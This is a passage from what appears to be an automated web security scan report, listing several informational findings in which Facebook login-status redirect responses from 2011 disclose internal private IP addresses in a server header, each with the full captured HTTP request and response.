Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ea1d5d78&origin=http%3A%2F%2Faol.sportingnews.com%2Ff110f82284&relation=parent&transport=postmessage&frame=f16efcbeb
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.68.111
X-Cnection: close
Date: Thu, 05 May 2011 02:05:21 GMT
Content-Length: 0


20.164. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.140.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9f2b9a3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1853bb678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe1c606f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfff1bc7e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a034a798%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fff1bc7e8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3025efcb8&relation=parent&transport=postmessage&frame=f3ce7949c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.25
X-Cnection: close
Date: Thu, 05 May 2011 11:42:07 GMT
Content-Length: 0


20.165. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.108.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ebc35c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cdf4eca4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1423356ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b1dbe64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb43fce3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3b1dbe64&origin=http%3A%2F%2Faol.sportingnews.com%2Ff168ca146&relation=parent&transport=postmessage&frame=f1ebccb7bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.123
X-Cnection: close
Date: Thu, 05 May 2011 02:18:01 GMT
Content-Length: 0


20.166. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.134.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df350c5b264%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34d6ac9f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31b992c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df179b0fcd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a9fdce78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f179b0fcd&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8d4ef228&relation=parent&transport=postmessage&frame=f2f047e444
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.134.120
X-Cnection: close
Date: Thu, 05 May 2011 01:08:29 GMT
Content-Length: 0


20.167. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.153.21

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d62909ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df226e646a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c693437c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df123801544%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12056d3b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f123801544&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3289058c4&relation=parent&transport=postmessage&frame=f13c54703c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.21
X-Cnection: close
Date: Thu, 05 May 2011 02:12:29 GMT
Content-Length: 0


20.168. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.74.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df174f0ecd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37efdf01%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34f256c48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b3caa33c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ae9e34c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1b3caa33c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff63f56b28&relation=parent&transport=postmessage&frame=f388264c08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.74.27
X-Cnection: close
Date: Thu, 05 May 2011 01:53:04 GMT
Content-Length: 0


20.169. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.193.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11dd7c8cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd23d5764%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2639845b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e940e90%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df204435c7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1e940e90&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1169c01d&relation=parent&transport=postmessage&frame=f2c4f1a838
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.193.37
X-Cnection: close
Date: Thu, 05 May 2011 01:25:15 GMT
Content-Length: 0


20.170. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.144.126

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31705a9b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34c5fb6e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27c3efee4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c6c9824%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cf347778%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1c6c9824&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1f93db008&relation=parent&transport=postmessage&frame=f27ddecc7
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.144.126
X-Cnection: close
Date: Thu, 05 May 2011 01:15:24 GMT
Content-Length: 0


20.171. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.45.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3685194ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c5df5e9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3085624e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b7fa1fe4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2aaa6ea6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2b7fa1fe4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8d390844&relation=parent&transport=postmessage&frame=f1ddcc193
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.45.63
X-Cnection: close
Date: Thu, 05 May 2011 00:59:53 GMT
Content-Length: 0


20.172. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.139.119

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16940ad7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bf1256c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff11b3d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2616e5be4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33d4df48c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
